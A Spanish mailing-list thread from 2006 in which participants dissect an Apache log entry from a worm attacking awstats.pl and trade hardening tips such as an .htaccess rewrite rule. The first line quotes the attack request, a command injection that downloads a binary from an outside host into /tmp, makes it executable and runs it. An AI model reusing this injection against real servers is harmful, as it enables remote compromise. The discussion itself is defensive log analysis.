61.178.21.179 - - [20/May/2006:23:58:23 +0200] "GET /awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20131%2e220%2e92%2e80%2fcacat%3bchmod%20%2bx%20cacat%3b%2e%2fcacat%20216%2e102%2e212%2e115;echo%20YYY;echo| HTTP/1.1" 404 1036 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
ichs! aunque cojo la idea, me pierdo con tanto %
Lo más importante es que Apache devuelve el código 404, es decir, "página no encontrada", "not found" :-))
ejem, y esa IP, se supone que es la del atacante? (o un zombie, dado el caso)
La IP atacante es la primera, la 61.178.21.179. La segunda, 131.220.92.80 es la que contiene el código del exploid y las herramientas para "hackear" la máquina víctima. La segunda acostumbra a estar en servidores gratuitos, tipo Terra de Brasil (a los que si escribes indicando la URL del código vírico no te hacen ni puto caso y también en ordenadores "zombies" cuyos dueños ni se enteran. Los hay en escuelas de China, conexiones por cable de Francia y una de las últimas que encontré era la web de una empresa que se decía especializada en seguridad informática. En esta me quedó la duda de si eran unos ineptos o de si estaban ampliando el mercado de clientes.
El gusano busca si drupal está instalado. Al no estarlo (respuesta 400) se acaba la sesión. Si la respuesta hubiera sido positiva (código 200 de Apache) entonces hubiera intentado inyectar el Exploid para drupal
Vale vale, dichosos script kiddies... eso no es ni hackear ni crackear ni na de na...
Es que la mayoría son "gusanos", los "worms" en inglés. Bichitos que andan sueltos por la red a la busca de incautos.
Hace tiempo estuve buscando herramientas para montarme un blog. Entre las candidatas estaba el Drupal, el post nuke, el word press... hay alguno considerado 'seguro'?
Se lo decía hace muy poco a Victor Hugo, no hay nada seguro en esta vida. :-) Para mi gusto el menos inseguro es Mambo, más que nada por el ".htacces" que lleva y que es una versión "apache" del código PHP de mi anterior mensage. Da algunos problemas pero impide aquella cadena fatídica del "log" que ponía, también, en mi mensaje anterior. Haber, es esta: ---- File .htacces ---- RewriteEngine On RewriteCond %{REQUEST_FILENAME} !-f RewriteCond %{REQUEST_FILENAME} !-d RewriteRule ^(.*) index.php ----- End File -----
[MODO AGRADECIMIENTO ON] Gracias Camaleón por tu consejo, no lo olvidaré nunca =:''-) [MODO AGRADECIMIENTO OFF]
uy uy uy uy, cuanto secretitoooo! :P
Que va, se publicó en la lista, creo que sobre Octubre-Noviembre del año pasado. 0=:-) A mi tampoco se me había ocurrido, a Camaleón si, de ahí el agradecimiento. =:''-)
else }
Aquí el "premio" para el hacker.
JA! Y qué cosas se le hacen? Cual es la costumbre?
Yo los reenvio a la oficina de denuncias de delitos informaticos de la Guardia Civil con un mensaje diciéndoles que su IP ha sido grabada. http://194.179.107.38/colabora.php
Este mail convalida por un cuatrimestre de seguridad informática. Cae en el próximo examen... pero seguro.
Mucho me temo que no. Yo no tengo estudios de informática, es más, yo soy de letras. :-) -- Salutacions - Saludos, Josep M. Queralt